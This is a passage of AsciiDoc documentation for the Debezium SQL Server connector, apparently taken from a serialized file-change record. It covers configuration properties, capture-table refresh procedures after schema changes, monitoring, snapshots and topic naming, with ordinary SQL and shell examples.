for truncates, and `none` to not skip any operations.\nBy default, truncate operations are skipped (not emitted by this connector).\n\n|[[sqlserver-property-signal-data-collection]]<<sqlserver-property-signal-data-collection,`+signal.data.collection+`>>\n|No default value\n| Fully-qualified name of the data collection that is used to send xref:{link-signalling}#debezium-signaling-enabling-signaling[signals] to the connector. +\nUse the following format to specify the collection name: +\n`_<databaseName>_._<schemaName>_._<tableName>_`\n\n|[[sqlserver-property-incremental-snapshot-allow-schema-changes]]<<sqlserver-property-incremental-snapshot-allow-schema-changes, `+incremental.snapshot.allow.schema.changes+`>>\n|`false`\n| Allow schema changes during an incremental snapshot. When enabled the connector will detect schema change during an incremental snapshot and re-select a current chunk to avoid locking DDLs. +\n +\nNote that changes to a primary key are not supported and can cause incorrect results if performed during an incremental snapshot. Another limitation is that if a schema change affects only columns' default values, then the change won't be detected until the DDL is processed from the binlog stream. This doesn't affect the snapshot events' values, but the schema of snapshot events may have outdated defaults.\n\n|[[sqlserver-property-incremental-snapshot-chunk-size]]<<sqlserver-property-incremental-snapshot-chunk-size, `+incremental.snapshot.chunk.size+`>>\n|`1024`\n|The maximum number of rows that the connector fetches and reads into memory during an incremental snapshot chunk.\nIncreasing the chunk size provides greater efficiency, because the snapshot runs fewer snapshot queries of a greater size.\nHowever, larger chunk sizes also require more memory to buffer the snapshot data.\nAdjust the chunk size to a value that provides the best performance in your environment.\n\n|[[sqlserver-property-max-iteration-transactions]]<<sqlserver-property-max-iteration-transactions, `+max.iteration.transactions+`>>\n|0\n|Specifies the maximum number of transactions per iteration to be used to reduce the memory footprint when streaming changes from multiple tables in a database.\nWhen set to `0` (the default), the connector uses the current maximum LSN as the range to fetch changes from.\nWhen set to a value greater than zero, the connector uses the n-th LSN specified by this setting as the range to fetch changes from.\n\n|[[sqlserver-property-incremental-snapshot-option-recompile]]<<sqlserver-property-incremental-snapshot-option-recompile, `+incremental.snapshot.option.recompile+`>>\n|`false`\n|Uses OPTION(RECOMPILE) query option to all SELECT statements used during an incremental snapshot. This can help to solve parameter sniffing issues that may occur but can cause increased CPU load on the source database, depending on the frequency of query execution.\n\n|[[sqlserver-property-topic-naming-strategy]]<<sqlserver-property-topic-naming-strategy, `topic.naming.strategy`>>\n|`io.debezium.schema.SchemaTopicNamingStrategy`\n|The name of the TopicNamingStrategy class that should be used to determine the topic name for data change, schema change, transaction, heartbeat event etc., defaults to `SchemaTopicNamingStrategy`.\n\n|[[sqlserver-property-topic-delimiter]]<<sqlserver-property-topic-delimiter, `topic.delimiter`>>\n|`.`\n|Specify the delimiter for topic name, defaults to `.`.\n\n|[[sqlserver-property-topic-cache-size]]<<sqlserver-property-topic-cache-size, `topic.cache.size`>>\n|`10000`\n|The size used for holding the topic names in bounded concurrent hash map. This cache will help to determine the topic name corresponding to a given data collection.\n\n|[[sqlserver-property-topic-heartbeat-prefix]]<<sqlserver-property-topic-heartbeat-prefix, `+topic.heartbeat.prefix+`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. The topic name has this pattern: +\n +\n_topic.heartbeat.prefix_._topic.prefix_ +\n +\nFor example, if the topic prefix is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[sqlserver-property-topic-transaction]]<<sqlserver-property-topic-transaction, `topic.transaction`>>\n|`transaction`\n|Controls the name of the topic to which the connector sends transaction metadata messages. The topic name has this pattern: +\n +\n_topic.prefix_._topic.transaction_ +\n +\nFor example, if the topic prefix is `fulfillment`, the default topic name is `fulfillment.transaction`.\n\nFor more information, see xref:sqlserver-transaction-metadata[Transaction Metadata].\n\n|===\n\n[id=\"debezium-sqlserver-connector-database-history-configuration-properties\"]\n==== {prodname} SQL Server connector database schema history configuration properties\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-configuration-database-history-properties.adoc[leveloffset=+1]\n\n[id=\"debezium-sqlserver-connector-pass-through-database-driver-configuration-properties\"]\n==== {prodname} SQL Server connector pass-through database driver configuration properties\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-pass-through-database-driver-configuration-properties.adoc[leveloffset=+1]\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: refreshing-capture-tables-after-a-schema-change\n\/\/ Title: Refreshing capture tables after a schema change\n[[sqlserver-schema-evolution]]\n== Database schema evolution\n\nWhen change data capture is enabled for a SQL Server table, as changes occur in the table, event records are persisted to a capture table on the server.\nIf you introduce a change in the structure of the source table change, for example, by adding a new column, that change is not dynamically reflected in the change table.\nFor as long as the capture table continues to use the outdated schema, the {prodname} connector is unable to emit data change events for the table correctly.\nYou must intervene to refresh the capture table to enable the connector to resume processing change events.\n\nBecause of the way that CDC is implemented in SQL Server, you cannot use {prodname} to update capture tables.\nTo refresh capture tables, one must be a SQL Server database operator with elevated privileges.\nAs a {prodname} user, you must coordinate tasks with the SQL Server database operator to complete the schema refresh and restore streaming to Kafka topics.\n\nYou can use one of the following methods to update capture tables after a schema change:\n\n* xref:{link-sqlserver-connector}#offline-schema-updates[Offline schema updates] require you to stop the {prodname} connector before you can update capture tables.\n* xref:{link-sqlserver-connector}#online-schema-updates[Online schema updates] can update capture tables while the {prodname} connector is running.\n\nThere are advantages and disadvantages to using each type of procedure.\n\n[WARNING]\n====\nWhether you use the online or offline update method, you must complete the entire schema update process before you apply subsequent schema updates on the same source table.\nThe best practice is to execute all DDLs in a single batch so the procedure can be run only once.\n====\n\n[NOTE]\n====\nSome schema changes are not supported on source tables that have CDC enabled.\nFor example, if CDC is enabled on a table, SQL Server does not allow you to change the schema of the table if you renamed one of its columns or changed the column type.\n====\n\n[NOTE]\n====\nAfter you change a column in a source table from `NULL` to `NOT NULL` or vice versa, the SQL Server connector cannot correctly capture the changed information until after you create a new capture instance.\nIf you do not create a new capture table after a change to the column designation, change event records that the connector emits do not correctly indicate whether the column is optional.\nThat is, columns that were previously defined as optional (or `NULL`) continue to be, despite now being defined as `NOT NULL`.\nSimilarly, columns that had been defined as required (`NOT NULL`), retain that designation, although they are now defined as `NULL`.\n====\n\n\/\/ Type: procedure\n\/\/ ModuleID: debezium-sql-server-connector-running-an-offline-update-after-a-schema-change\n\/\/ Title: Running an offline update after a schema change\n[id=\"offline-schema-updates\"]\n=== Offline schema updates\n\nOffline schema updates provide the safest method for updating capture tables.\nHowever, offline updates might not be feasible for use with applications that require high-availability.\n\n.Prerequisites\n* An update was committed to the schema of a SQL Server table that has CDC enabled.\n* You are a SQL Server database operator with elevated privileges.\n\n.Procedure\n\n1. Suspend the application that updates the database.\n2. Wait for the {prodname} connector to stream all unstreamed change event records.\n3. Stop the {prodname} connector.\n4. Apply all changes to the source table schema.\n5. Create a new capture table for the update source table using `sys.sp_cdc_enable_table` procedure with a unique value for parameter `@capture_instance`.\n6. Resume the application that you suspended in Step 1.\n7. Start the {prodname} connector.\n8. After the {prodname} connector starts streaming from the new capture table, drop the old capture table by running the stored procedure `sys.sp_cdc_disable_table` with the parameter `@capture_instance` set to the old capture instance name.\n\n\/\/ Type: procedure\n\/\/ ModuleID: debezium-sql-server-connector-running-an-online-update-after-a-schema-change\n\/\/ Title: Running an online update after a schema change\n[id=\"online-schema-updates\"]\n=== Online schema updates\n\nThe procedure for completing an online schema updates is simpler than the procedure for running an offline schema update,\nand you can complete it without requiring any downtime in application and data processing.\nHowever, with online schema updates, a potential processing gap can occur after you update the schema in the source database,\nbut before you create the new capture instance.\nDuring that interval, change events continue to be captured by the old instance of the change table,\nand the change data that is saved to the old table retains the structure of the earlier schema.\nSo, for example, if you added a new column to a source table, change events that are produced before the new capture table is ready, do not contain a field for the new column.\nIf your application does not tolerate such a transition period, it is best to use the offline schema update procedure.\n\n.Prerequisites\n* An update was committed to the schema of a SQL Server table that has CDC enabled.\n* You are a SQL Server database operator with elevated privileges.\n\n.Procedure\n1. Apply all changes to the source table schema.\n2. Create a new capture table for the update source table by running the `sys.sp_cdc_enable_table` stored procedure with a unique value for the parameter `@capture_instance`.\n3. When {prodname} starts streaming from the new capture table, you can drop the old capture table by running the `sys.sp_cdc_disable_table` stored procedure with the parameter `@capture_instance` set to the old capture instance name.\n\n\n.Example: Running an online schema update after a database schema change\nifdef::community[]\nLet's deploy the SQL Server based https:\/\/github.com\/debezium\/debezium-examples\/tree\/main\/tutorial#using-sql-server[{prodname} tutorial] to demonstrate the online schema update.\n\nIn the following example, a column `phone_number` is added to the `customers` table.\n\n. Type the following command to start the database shell:\n[source,shell]\n----\ndocker-compose -f docker-compose-sqlserver.yaml exec sqlserver bash -c '\/opt\/mssql-tools\/bin\/sqlcmd -U sa -P $SA_PASSWORD -d testDB'\n----\nendif::community[]\n\nifdef::product[]\n\nThe following example shows how to complete an online schema update in the change table after the column `phone_number` is added to the `customers` source table.\n\nendif::product[]\n\n. Modify the schema of the `customers` source table by running the following query to add the `phone_number` field:\n+\n[source,sql]\n----\nALTER TABLE customers ADD phone_number VARCHAR(32);\n----\n\n. Create the new capture instance by running the `sys.sp_cdc_enable_table` stored procedure.\n+\n[source,sql]\n----\nEXEC sys.sp_cdc_enable_table @source_schema = 'dbo', @source_name = 'customers', @role_name = NULL, @supports_net_changes = 0, @capture_instance = 'dbo_customers_v2';\nGO\n----\n\n. Insert new data into the `customers` table by running the following query:\n[source,sql]\n+\n----\nINSERT INTO customers(first_name,last_name,email,phone_number) VALUES ('John','Doe','john.doe@example.com', '+1-555-123456');\nGO\n----\n+\nThe Kafka Connect log reports on configuration updates through entries similar to the following message:\n+\n[source,shell]\n----\nconnect_1 | 2019-01-17 10:11:14,924 INFO || Multiple capture instances present for the same table: Capture instance \"dbo_customers\" [sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_CT, startLsn=00000024:00000d98:0036, changeTableObjectId=1525580473, stopLsn=00000025:00000ef8:0048] and Capture instance \"dbo_customers_v2\" [sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_v2_CT, startLsn=00000025:00000ef8:0048, changeTableObjectId=1749581271, stopLsn=NULL] [io.debezium.connector.sqlserver.SqlServerStreamingChangeEventSource]\nconnect_1 | 2019-01-17 10:11:14,924 INFO || Schema will be changed for ChangeTable [captureInstance=dbo_customers_v2, sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_v2_CT, startLsn=00000025:00000ef8:0048, changeTableObjectId=1749581271, stopLsn=NULL] [io.debezium.connector.sqlserver.SqlServerStreamingChangeEventSource]\n...\nconnect_1 | 2019-01-17 10:11:33,719 INFO || Migrating schema to ChangeTable [captureInstance=dbo_customers_v2, sourceTableId=testDB.dbo.customers, changeTableId=testDB.cdc.dbo_customers_v2_CT, startLsn=00000025:00000ef8:0048, changeTableObjectId=1749581271, stopLsn=NULL] [io.debezium.connector.sqlserver.SqlServerStreamingChangeEventSource]\n----\n+\nEventually, the `phone_number` field is added to the schema and its value appears in messages written to the Kafka topic.\n+\n[source,json]\n----\n...\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"phone_number\"\n }\n...\n \"after\": {\n \"id\": 1005,\n \"first_name\": \"John\",\n \"last_name\": \"Doe\",\n \"email\": \"john.doe@example.com\",\n \"phone_number\": \"+1-555-123456\"\n },\n----\n\n. Drop the old capture instance by running the `sys.sp_cdc_disable_table` stored procedure.\n+\n[source,sql]\n----\nEXEC sys.sp_cdc_disable_table @source_schema = 'dbo', @source_name = 'dbo_customers', @capture_instance = 'dbo_customers';\nGO\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-sql-server-connector-performance\n\/\/ Title: Monitoring {prodname} SQL Server connector performance\n[[sqlserver-monitoring]]\n== Monitoring\n\nThe {prodname} SQL Server connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\nThe connector provides the following metrics:\n\n* xref:sqlserver-snapshot-metrics[Snapshot metrics] for monitoring the connector when performing snapshots.\n* xref:sqlserver-streaming-metrics[Streaming metrics] for monitoring the connector when reading CDC table data.\n* xref:sqlserver-schema-history-metrics[Schema history metrics] for monitoring the status of the connector's schema history.\n\nFor information about how to expose the preceding metrics through JMX, see the {link-prefix}:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation].\n\n\/\/ Type: reference\n\/\/ ModuleID: debezium-sqlserver-connector-snapshot-metrics\n\/\/ Title: {prodname} SQL Server connector snapshot metrics\n[[sqlserver-snapshot-metrics]]\n=== Snapshot metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=sqlserver-snapshot]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-incremental-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: debezium-sqlserver-connector-streaming-metrics\n\/\/ Title: {prodname} SQL Server connector streaming metrics\n[[sqlserver-streaming-metrics]]\n=== Streaming metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/frag-common-mbean-name.adoc[leveloffset=+1,tags=sqlserver-streaming]\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: debezium-sqlserver-connector-schema-history-metrics\n\/\/ Title: {prodname} SQL Server connector schema history metrics\n[[sqlserver-schema-history-metrics]]\n=== Schema history metrics\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n","old_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n\/\/ ModuleID: debezium-connector-for-sql-server\n[id=\"debezium-connector-for-sql-server\"]\n= {prodname} connector for SQL Server\n\n:context: sqlserver\n:data-collection: table\n:mbean-name: sql_server\n:connector-file: {context}\n:connector-class: SqlServer\n:connector-name: SQL Server\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\n[NOTE]\n====\nWant to help us further hone and improve it? link:\/docs\/contribute\/[Learn how].\n====\n\ntoc::[]\nendif::community[]\n\nThe {prodname} SQL Server connector captures row-level changes that occur in the schemas of a SQL Server database.\n\nifdef::community[]\nFor information about the SQL Server versions that are compatible with this connector, see the link:https:\/\/debezium.io\/releases\/[{prodname} release overview].\nendif::community[]\nifdef::product[]\nFor information about the SQL Server versions that are compatible with this connector, see the link:{LinkDebeziumSupportedConfigurations}[{NameDebeziumSupportedConfigurations}].\nendif::product[]\n\nifdef::product[]\n\nFor details about the {prodname} SQL Server connector and its use, see following topics:\n\n* xref:overview-of-debezium-sql-server-connector[]\n* xref:how-debezium-sql-server-connectors-work[]\n* xref:descriptions-of-debezium-sql-server-connector-data-change-events[]\n* xref:how-debezium-sql-server-connectors-map-data-types[]\n* xref:setting-up-sql-server-for-use-with-the-debezium-sql-server-connector[]\n* xref:deployment-of-debezium-sql-server-connectors[]\n* xref:refreshing-capture-tables-after-a-schema-change[]\n* xref:monitoring-debezium-sql-server-connector-performance[]\n\nendif::product[]\n\nThe first time that the {prodname} SQL Server connector connects to a SQL Server database or cluster, it takes a consistent snapshot of the schemas in the database.\nAfter the initial snapshot is complete, the connector continuously captures row-level changes for `INSERT`, `UPDATE`, or `DELETE` operations that are committed to the SQL Server databases that are enabled for CDC.\nThe connector produces events for each data change operation, and streams them to Kafka topics.\nThe connector streams all of the events for a table to a dedicated Kafka topic.\nApplications and services can then consume data change event records from that topic.\n\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} SQL Server connector\n\/\/ ModuleID: overview-of-debezium-sql-server-connector\n[[sqlserver-overview]]\n== Overview\n\nThe {prodname} SQL Server connector is based on the https:\/\/docs.microsoft.com\/en-us\/sql\/relational-databases\/track-changes\/about-change-data-capture-sql-server?view=sql-server-2017[change data capture]\nfeature that is available in https:\/\/blogs.msdn.microsoft.com\/sqlreleaseservices\/sql-server-2016-service-pack-1-sp1-released\/[SQL Server 2016 Service Pack 1 (SP1) and later] Standard edition or Enterprise edition.\nThe SQL Server capture process monitors designated databases and tables, and stores the changes into specifically created _change tables_ that have stored procedure facades.\n\nTo enable the {prodname} SQL Server connector to capture change event records for database operations,\nyou must first enable change data capture on the SQL Server database.\nCDC must be enabled on both the database and on each table that you want to capture.\nAfter you set up CDC on the source database, the connector can capture row-level `INSERT`, `UPDATE`, and `DELETE` operations\nthat occur in the database.\nThe connector writes event records for each source table to a Kafka topic especially dedicated to that table.\nOne topic exists for each captured table.\nClient applications read the Kafka topics for the database tables that they follow, and can respond to the row-level events they consume from those topics.\n\nThe first time that the connector connects to a SQL Server database or cluster, it takes a consistent snapshot of the schemas for all tables for which it is configured to capture changes,\nand streams this state to Kafka.\nAfter the snapshot is complete, the connector continuously captures subsequent row-level changes that occur.\nBy first establishing a consistent view of all of the data, the connector can continue reading without having lost any of the changes that were made while the snapshot was taking place.\n\nThe {prodname} SQL Server connector is tolerant of failures.\nAs the connector reads changes and produces events, it periodically records the position of events in the database log (_LSN \/ Log Sequence Number_).\nIf the connector stops for any reason (including communication failures, network problems, or crashes), after a restart the connector resumes reading the SQL Server _CDC_ tables from the last point that it read.\n\nNOTE: Offsets are committed periodically.\nThey are not committed at the time that a change event occurs.\nAs a result, following an outage, duplicate events might be generated.\n\nFault tolerance also applies to snapshots.\nThat is, if the connector stops during a snapshot, the connector begins a new snapshot when it restarts.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-sql-server-connectors-work\n\/\/ Title: How {prodname} SQL Server connectors work\n[[how-the-sqlserver-connector-works]]\n== How the SQL Server connector works\n\nTo optimally configure and run a {prodname} SQL Server connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and uses metadata.\n\nifdef::product[]\n\nFor details about how the connector works, see the following sections:\n\n* xref:how-debezium-sql-server-connectors-perform-database-snapshots[]\n* xref:how-the-debezium-sql-server-connector-reads-change-data-tables[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-sql-server-change-event-records[]\n* xref:how-the-debezium-sql-server-connector-uses-the-schema-change-topic[]\n* xref:descriptions-of-debezium-sql-server-connector-data-change-events[]\n* xref:debezium-sql-server-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} SQL Server connectors perform database snapshots\n\/\/ ModuleID: how-debezium-sql-server-connectors-perform-database-snapshots\n[[sqlserver-snapshots]]\n=== Snapshots\n\nSQL Server CDC is not designed to store a complete history of database changes.\nFor the {prodname} SQL Server connector to establish a baseline for the current state of the database,\nit uses a process called _snapshotting_.\n\nYou can configure how the connector creates snapshots.\nBy default, the connector's snapshot mode is set to `initial`.\nBased on this `initial` snapshot mode, the first time that the connector starts, it performs an initial _consistent snapshot_ of the database.\nThis initial snapshot captures the structure and data for any tables that match the criteria defined by the `include` and `exclude` properties that are configured for the connector (for example, `table.include.list`, `column.include.list`, `table.exclude.list`, and so forth).\n\nWhen the connector creates a snapshot, it completes the following tasks:\n\n1. Determines the tables to be captured.\n2. Obtains a lock on the SQL Server tables for which CDC is enabled to prevent structural changes from occurring during creation of the snapshot.\nThe level of the lock is determined by `snapshot.isolation.mode` configuration option.\n3. Reads the maximum log sequence number (LSN) position in the server's transaction log.\n4. Captures the structure of all relevant tables.\n5. Releases the locks obtained in Step 2, if necessary. In most cases, locks are held for only a short period of time.\n6. Scans the SQL Server source tables and schemas to be captured based on the LSN position that was read in Step 3, generates a `READ` event for each row in the table, and writes the events to the Kafka topic for the table.\n7. Records the successful completion of the snapshot in the connector offsets.\n\nThe resulting initial snapshot captures the current state of each row in the tables that are enabled for CDC.\nFrom this baseline state, the connector captures subsequent changes as they occur.\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-sqlserver-ad-hoc-snapshots\n[id=\"sqlserver-ad-hoc-snapshots\"]\n==== Ad hoc snapshots\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-ad-hoc-snapshots.adoc[leveloffset=+3]\n\n\/\/ Type: concept\n[id=\"sqlserver-incremental-snapshots\"]\n==== Incremental snapshots\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-incremental-snapshot.adoc[leveloffset=+3]\n\n[WARNING]\n====\nThe {prodname} connector for SQL Server does not support schema changes while an incremental snapshot is running.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: how-the-debezium-sql-server-connector-reads-change-data-tables\n\/\/ Title: How {prodname} SQL Server connectors read change data tables\n=== Reading the change data tables\n\nWhen the connector first starts, it takes a structural snapshot of the structure of the captured tables\nand persists this information to its internal database schema history topic.\nThe connector then identifies a change table for each source table, and completes the following steps.\n\n1. For each change table, the connector read all of the changes that were created between the last stored maximum LSN and the current maximum LSN.\n2. The connector sorts the changes that it reads in ascending order, based on the values of their commit LSN and change LSN.\nThis sorting order ensures that the changes are replayed by {prodname} in the same order in which they occurred in the database.\n3. The connector passes the commit and change LSNs as offsets to Kafka Connect.\n4. The connector stores the maximum LSN and restarts the process from Step 1.\n\nAfter a restart, the connector resumes processing from the last offset (commit and change LSNs) that it read.\n\nThe connector is able to detect whether CDC is enabled or disabled for included source tables and adjust its behavior.\n\n\/\/ Type: concept\n\/\/ ModuleID: no-maximum-lsn-recorded-in-the-database\n\/\/ Title: No maximum LSN recorded in the database\n=== No maximum LSN recorded in the database\n\nThere may be situations when no maximum LSN is recorded in the database because:\n\n1. SQL Server Agent is not running\n2. No changes are recorded in the change table yet\n3. Database has low activity and the cdc clean up job periodically clears entries from the cdc tables\n\nOut of these possibilities, since a running SQL Server Agent is a prerequisite, No 1. is a real problem (while No 2. and 3. are normal).\n\nIn order to mitigate this issue and differentiate between No 1. and the others, a check for the status of the SQL Server Agent is done through the following query `\"SELECT CASE WHEN dss.[status]=4 THEN 1 ELSE 0 END AS isRunning FROM [#db].sys.dm_server_services dss WHERE dss.[servicename] LIKE N'SQL Server Agent (%';\"`.\nIf the SQL Server Agent is not running, an ERROR is written in the log: \"No maximum LSN recorded in the database; SQL Server Agent is not running\".\n\n[IMPORTANT]\n====\nThe SQL Server Agent running status query requires `VIEW SERVER STATE` server permission.\nIf you don't want to grant this permission to the configured user, you can choose to configure your own query through the `database.sqlserver.agent.status.query` property.\nYou can define a function which returns true or 1 if SQL Server Agent is running (false or 0 otherwise) and safely use High-Level permissions without granting them as explained\nhere link:https:\/\/dba.stackexchange.com\/questions\/62230\/what-minimum-permissions-do-i-need-to-provide-to-a-user-so-that-it-can-check-the\/103275#103275[What minimum permissions do I need to provide to a user so that it can check the status of SQL Server Agent Service?]\nor here link:https:\/\/sqlquantumleap.com\/2018\/02\/15\/safely-and-easily-use-high-level-permissions-without-granting-them-to-anyone-server-level\/[Safely and Easily Use High-Level Permissions Without Granting Them to Anyone: Server-level].\nThe configuration of the query property would look like: `database.sqlserver.agent.status.query=SELECT [#db].func_is_sql_server_agent_running()` - you need to use `[#db]` as placeholder for the database name.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: limitations-sql-server-connector\n\/\/ Title: Limitations of {prodname} SQL Server connector\n=== Limitations\n\nSQL Server specifically requires the base object to be a table in order to create a change capture instance.\nAs consequence, capturing changes from indexed views (aka. materialized views) is not supported by SQL Server and hence {prodname} SQL Server connector.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-sql-server-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} SQL Server change event records\n[[sqlserver-topic-names]]\n=== Topic names\n\nBy default, the SQL Server connector writes events for all `INSERT`, `UPDATE`, and `DELETE` operations that occur in a table to a single Apache Kafka topic that is specific to that table.\nThe connector uses the following convention to name change event topics:\n`_<topicPrefix>_._<schemaName>_._<tableName>_`\n\nThe following list provides definitions for the components of the default name:\n\n_topicPrefix_:: The logical name of the server, as specified by the xref:sqlserver-property-topic-prefix[`topic.prefix`] configuration property.\n_schemaName_:: The name of the database schema in which the change event occurred.\n_tableName_:: The name of the database table in which the change event occurred.\n\nFor example, if `fulfillment` is the server name, and `dbo` is the schema name, and the database contains tables with the names `products`, `products_on_hand`, `customers`, and `orders`,\nthe connector would stream change event records to the following Kafka topics:\n\n* `fulfillment.testDB.dbo.products`\n* `fulfillment.testDB.dbo.products_on_hand`\n* `fulfillment.testDB.dbo.customers`\n* `fulfillment.testDB.dbo.orders`\n\nThe connector applies similar naming conventions to label its internal database schema history topics, xref:about-the-debezium-sqlserver-connector-schema-change-topic[schema change topics], and xref:sqlserver-transaction-metadata[transaction metadata topics].\n\nIf the default topic name do not meet your requirements, you can configure custom topic names.\nTo configure custom topic names, you specify regular expressions in the logical topic routing SMT.\nFor more information about using the logical topic routing SMT to customize topic naming, see xref:{link-topic-routing}#topic-routing[Topic routing].\n\n\n\/\/ Type: concept\n\/\/ ModuleID: how-the-debezium-sql-server-connector-uses-the-schema-change-topic\n\/\/ Title: How the {prodname} SQL Server connector uses the schema change topic\n[[about-the-debezium-sqlserver-connector-schema-change-topic]]\n=== Schema change topic\n\nFor each table for which CDC is enabled, the {prodname} SQL Server connector stores a history of the schema change events that are applied to captured tables in the database.\nThe connector writes schema change events to a Kafka topic named `_<topicPrefix>_`, where `_topicPrefix_` is the logical server name that is specified in the xref:sqlserver-property-topic-prefix[`topic.prefix`] configuration property.\n\nMessages that the connector sends to the schema change topic contain a payload, and, optionally, also contain the schema of the change event message.\nThe payload of a schema change event message includes the following elements:\n\n`databaseName`:: The name of the database to which the statements are applied.\nThe value of `databaseName` serves as the message key.\n`tableChanges`:: A structured representation of the entire table schema after the schema change.\nThe `tableChanges` field contains an array that includes entries for each column of the table.\nBecause the structured representation presents data in JSON or Avro format, consumers can easily read messages without first processing them through a DDL parser.\n\n[IMPORTANT]\n====\nWhen the connector is configured to capture a table, it stores the history of the table's schema changes not only in the schema change topic, but also in an internal database schema history topic.\nThe internal database schema history topic is for connector use only and it is not intended for direct use by consuming applications.\nEnsure that applications that require notifications about schema changes consume that information only from the schema change topic.\n====\n\n[WARNING]\n====\nThe format of the messages that a connector emits to its schema change topic is in an incubating state and can change without notice.\n====\n\n{prodname} emits a message to the schema change topic when the following events occur:\n\n* You enable CDC for a table.\n* You disable CDC for a table.\n* You alter the structure of a table for which CDC is enabled by following the xref:{link-sqlserver-connector}#sqlserver-schema-evolution[schema evolution procedure].\n\n.Example: Message emitted to the SQL Server connector schema change topic\nThe following example shows a message in the schema change topic.\nThe message contains a logical representation of the table schema.\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n ...\n },\n \"payload\": {\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"connector\": \"sqlserver\",\n \"name\": \"server1\",\n \"ts_ms\": 0,\n \"snapshot\": \"true\",\n \"db\": \"testDB\",\n \"schema\": \"dbo\",\n \"table\": \"customers\",\n \"change_lsn\": null,\n \"commit_lsn\": \"00000025:00000d98:00a2\",\n \"event_serial_no\": null\n },\n \"ts_ms\": 1588252618953, \/\/ <1>\n \"databaseName\": \"testDB\", \/\/ <2>\n \"schemaName\": \"dbo\",\n \"ddl\": null, \/\/ <3>\n \"tableChanges\": [ \/\/ <4>\n {\n \"type\": \"CREATE\", \/\/ <5>\n \"id\": \"\\\"testDB\\\".\\\"dbo\\\".\\\"customers\\\"\", \/\/ <6>\n \"table\": { \/\/ <7>\n \"defaultCharsetName\": null,\n \"primaryKeyColumnNames\": [ \/\/ <8>\n \"id\"\n ],\n \"columns\": [ \/\/ <9>\n {\n \"name\": \"id\",\n \"jdbcType\": 4,\n \"nativeType\": null,\n \"typeName\": \"int identity\",\n \"typeExpression\": \"int identity\",\n \"charsetName\": null,\n \"length\": 10,\n \"scale\": 0,\n \"position\": 1,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"first_name\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 2,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"last_name\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 3,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"email\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 4,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n }\n ],\n \"attributes\": [ \/\/ <10>\n {\n \"customAttribute\": \"attributeValue\"\n }\n ]\n }\n }\n ]\n }\n}\n----\n\n.Descriptions of fields in messages emitted to the schema change topic\n[cols=\"1,4,5\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`ts_ms`\n|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\nIn the source object, ts_ms indicates the time that the change was made in the database. By comparing the value for payload.source.ts_ms with the value for payload.ts_ms, you can determine the lag between the source database update and Debezium.\n\n|2\n|`databaseName` +\n`schemaName`\n|Identifies the database and the schema that contain the change.\n\n|3\n|`ddl`\n|Always `null` for the SQL Server connector.\nFor other connectors, this field contains the DDL responsible for the schema change.\nThis DDL is not available to SQL Server connectors.\n\n|4\n|`tableChanges`\n|An array of one or more items that contain the schema changes generated by a DDL command.\n\n|5\n|`type`\na|Describes the kind of change. The value is one of the following:\n\n* `CREATE` - table created\n* `ALTER` - table modified\n* `DROP` - table 